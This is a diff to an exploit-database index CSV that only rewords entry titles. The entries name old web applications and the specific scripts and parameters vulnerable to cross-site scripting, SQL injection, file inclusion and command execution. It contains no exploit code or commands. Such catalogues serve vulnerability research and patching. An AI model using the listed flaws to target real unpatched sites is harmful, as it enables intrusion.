34322,platforms/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk - products_search.php search_category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 +34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk - 'products_search.php?search_category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,cp77fk4r,asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0 -34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 -34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 -34349,platforms/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0 +34345,platforms/java/webapps/34345.txt,"jCore - 'search' Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 +34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 +34349,platforms/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Remote File Inclusion",2010-07-18,eidelweiss,php,webapps,0 34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps,0 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0 -34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 Beta - 'uid' Parameter SQL Injection",2010-07-19,"Dinesh Arora",php,webapps,0 -34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusion",2009-12-14,Packetdeath,php,webapps,0 +34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 Beta - 'uid' SQL Injection",2010-07-19,"Dinesh Arora",php,webapps,0 +34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusions",2009-12-14,Packetdeath,php,webapps,0 34357,platforms/php/webapps/34357.txt,"Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps,0 34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass",2014-08-18,zixian,hardware,webapps,80 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 @@ -34180,7 +34181,7 @@ id,file,description,date,author,platform,type,port 34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 -34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 +34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)",2010-10-04,Abysssec,php,webapps,0 34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0 34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 @@ -34191,17 +34192,17 @@ id,file,description,date,author,platform,type,port 34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting / Information Disclosure",2010-07-28,MaXe,jsp,webapps,0 34386,platforms/php/webapps/34386.txt,"Cetera eCommerce - Multiple SQL Injections",2010-07-28,MustLive,php,webapps,0 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 -34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 +34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 34389,platforms/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 -34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 +34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 -34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - reviews.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk - forum.php forum_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - 'reviews.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 -34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'Filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 +34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'Filename' Directory Traversal",2009-10-04,esnra,php,webapps,0 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,php,webapps,0 34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",multiple,webapps,80 @@ -34209,21 +34210,21 @@ id,file,description,date,author,platform,type,port 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - 'group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps,0 34411,platforms/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",asp,webapps,0 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings setting[site_title]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34414,platforms/php/webapps/34414.txt,"DiamondList - '/user/main/update_category category[description]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34414,platforms/php/webapps/34414.txt,"DiamondList - '/user/main/update_category?category[description]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34416,platforms/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Parameter Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps,0 +34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php cat' Parameter SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php?cat' SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34424,platforms/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 34432,platforms/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps,0 -34456,platforms/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 +34456,platforms/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injections",2009-08-31,Inj3ct0r,php,webapps,0 34436,platforms/php/webapps/34436.txt,"WordPress Plugin ShortCode 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",jsp,webapps,0 @@ -34231,7 +34232,7 @@ id,file,description,date,author,platform,type,port 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34444,platforms/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 -34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - include/ajax/blogInfo.php asd Parameter Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 +34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - 'include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 @@ -34239,38 +34240,38 @@ id,file,description,date,author,platform,type,port 34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 -34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)",2010-08-12,Affix,php,webapps,0 +34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,php,webapps,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 -34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' Parameter SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 -34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 +34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 +34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34469,platforms/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34470,platforms/php/webapps/34470.txt,"Beex - 'news.php' navaction Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34471,platforms/php/webapps/34471.txt,"Beex - partneralle.php navaction Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 +34471,platforms/php/webapps/34471.txt,"Beex - 'partneralle.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 +34473,platforms/php/webapps/34473.txt,"Property Watch - 'email.php?videoid' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 -34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0 -34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 +34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 +34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0 +34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0 34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 +34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0 -34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 +34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 34493,platforms/php/webapps/34493.txt,"Payment Processor Script (PPScript) - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps,0 -34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk - products.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk - article.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - product_details.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk - 'products.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk - 'article.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - 'product_details.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php' Filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 -34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img' Parameter Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34518,platforms/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 @@ -34278,7 +34279,7 @@ id,file,description,date,author,platform,type,port 34524,platforms/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34637,platforms/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 -34684,platforms/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0 +34684,platforms/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,php,webapps,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps,0 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps,0 34534,platforms/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 @@ -34287,14 +34288,14 @@ id,file,description,date,author,platform,type,port 34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0 -34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 -34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 -34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 -34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - globals.php tabpage Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 -34547,platforms/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 - custom.php testmode Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 -34548,platforms/php/webapps/34548.txt,"Datemill - photo_view.php return Parameter Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 -34549,platforms/php/webapps/34549.txt,"Datemill - photo_search.php st Parameter Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 -34550,platforms/php/webapps/34550.txt,"Datemill - search.php st Parameter Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 +34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'Parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - 'idstatusframe.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-31,"Mr Teatime",php,webapps,0 +34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - 'survey.php?category' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - 'globals.php?tabpage' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34547,platforms/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 - 'custom.php?testmode' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34548,platforms/php/webapps/34548.txt,"Datemill - 'photo_view.php?return' Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 +34549,platforms/php/webapps/34549.txt,"Datemill - 'photo_search.php?st' Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 +34550,platforms/php/webapps/34550.txt,"Datemill - 'search.php?st' Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 34551,platforms/php/webapps/34551.txt,"IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking",2014-09-07,"Piotr S.",php,webapps,0 34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,php,webapps,0 34553,platforms/php/webapps/34553.txt,"WordPress Plugin Like Dislike Counter 1.2.3 - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps,0 @@ -34303,8 +34304,8 @@ id,file,description,date,author,platform,type,port 34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34560,platforms/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",php,webapps,0 -34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Parameter Remote File Inclusion",2009-09-07,Securitylab.ir,php,webapps,0 -34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 - 'q' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 +34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion",2009-09-07,Securitylab.ir,php,webapps,0 +34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 - 'q' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 @@ -34326,48 +34327,48 @@ id,file,description,date,author,platform,type,port 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site - Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps,0 -34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injections",2009-09-10,Mr.SQL,php,webapps,0 -34600,platforms/php/webapps/34600.txt,"Match Agency BiZ - edit_profile.php important Parameter Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 -34601,platforms/php/webapps/34601.txt,"Match Agency BiZ - report.php pid Parameter Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 +34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Multiple SQL Injections",2009-09-10,Mr.SQL,php,webapps,0 +34600,platforms/php/webapps/34600.txt,"Match Agency BiZ - 'edit_profile.php?important' Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 +34601,platforms/php/webapps/34601.txt,"Match Agency BiZ - 'report.php?pid' Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting",2009-09-02,Moudi,php,webapps,0 